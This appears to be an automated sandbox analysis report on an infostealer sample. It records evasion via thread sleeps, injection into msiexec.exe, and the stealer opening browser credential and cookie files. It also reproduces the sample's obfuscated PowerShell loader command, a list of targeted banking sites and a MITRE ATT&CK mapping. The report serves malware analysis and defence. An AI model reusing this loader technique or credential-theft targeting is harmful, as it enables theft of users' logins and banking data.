          Source: C:\Users\user\Desktop\rAntephialtic.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd4D6C.tmp\nsExec.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820 | Thread sleep time: -10145709240540247s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -22136092888451448s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -600000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7300 | Thread sleep count: 3406 > 30
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -599884s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7300 | Thread sleep count: 6447 > 30
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -599781s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -599672s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -599562s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -599453s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -599344s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -599219s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -599100s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -599000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -598889s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -598781s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -598672s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -598562s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -598453s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -598344s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -598234s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -598125s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -598015s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -597906s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -597797s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -597687s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -597573s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -597466s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -597359s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -597233s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -597109s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -596998s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -596890s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -596770s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -596656s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -596545s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -596417s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -596312s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -596203s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -596086s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -595984s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -595875s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -595765s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -595656s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -595547s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -595437s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -595328s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -595219s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -595094s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -594984s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -594875s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -594765s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -594656s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580 | Thread sleep time: -594547s >= -30000s
          Source: C:\Users\user\Desktop\rAntephialtic.exe | Code function: 1_2_00406739 FindFirstFileW,FindClose
          Source: C:\Users\user\Desktop\rAntephialtic.exe | Code function: 1_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
          Source: C:\Users\user\Desktop\rAntephialtic.exe | Code function: 1_2_00402902 FindFirstFileW
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
          Source: powershell.exe, 00000003.00000002.1814890454.000000000502E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
          Source: msiexec.exe, 00000006.00000002.2545108464.000000000994A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2545108464.00000000099AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: msiexec.exe, 00000006.00000002.2545108464.00000000099AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWLw.
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
          Source: powershell.exe, 00000003.00000002.1814890454.000000000502E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696492231f
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696492231j
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
          Source: powershell.exe, 00000003.00000002.1814890454.000000000502E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter@\
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696492231x
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
          Source: powershell.exe, 00000003.00000002.1814890454.000000000502E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.1814890454.000000000502E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter@\
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
          Source: powershell.exe, 00000003.00000002.1814890454.000000000502E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter@\
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
          Source: C:\Users\user\Desktop\rAntephialtic.exe | API call chain: ExitProcess graph end node (graph_1-3722)
          Source: C:\Users\user\Desktop\rAntephialtic.exe | API call chain: ExitProcess graph end node (graph_1-3719)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3A80000
          Source: C:\Users\user\Desktop\rAntephialtic.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\rAntephialtic.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$anskueliggres=gc -raw 'c:\users\user\appdata\roaming\svampestuvningernes\circumcising\subcommissionership\kinestheses.tra';$sprrereglernes=$anskueliggres.substring(54058,3);.$sprrereglernes($anskueliggres)"
          Source: C:\Users\user\Desktop\rAntephialtic.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$anskueliggres=gc -raw 'c:\users\user\appdata\roaming\svampestuvningernes\circumcising\subcommissionership\kinestheses.tra';$sprrereglernes=$anskueliggres.substring(54058,3);.$sprrereglernes($anskueliggres)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040348F

Stealing of Sensitive Information

Source: Yara match | File source: 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2558138839.0000000025871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 8180, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Remote Access Functionality

Source: Yara match | File source: 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2558138839.0000000025871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 8180, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; leading numbers are the report's count badges, kept as displayed)

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services
Execution: 1 Windows Management Instrumentation | 1 Command and Scripting Interpreter | 1 PowerShell | Cron | Launchd | Scheduled Task | Systemd Timers
Persistence: 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items
Privilege Escalation: 1 DLL Side-Loading | 1 Access Token Manipulation | 311 Process Injection | Login Hook | Network Logon Script | RC Scripts | Startup Items
Defense Evasion: 2 Obfuscated Files or Information | 1 Software Packing | 1 DLL Side-Loading | 1 Masquerading | 31 Virtualization/Sandbox Evasion | 1 Access Token Manipulation | 311 Process Injection
Credential Access: 1 OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync
Discovery: 3 File and Directory Discovery | 14 System Information Discovery | 111 Security Software Discovery | 1 Process Discovery | 31 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 1 System Network Configuration Discovery
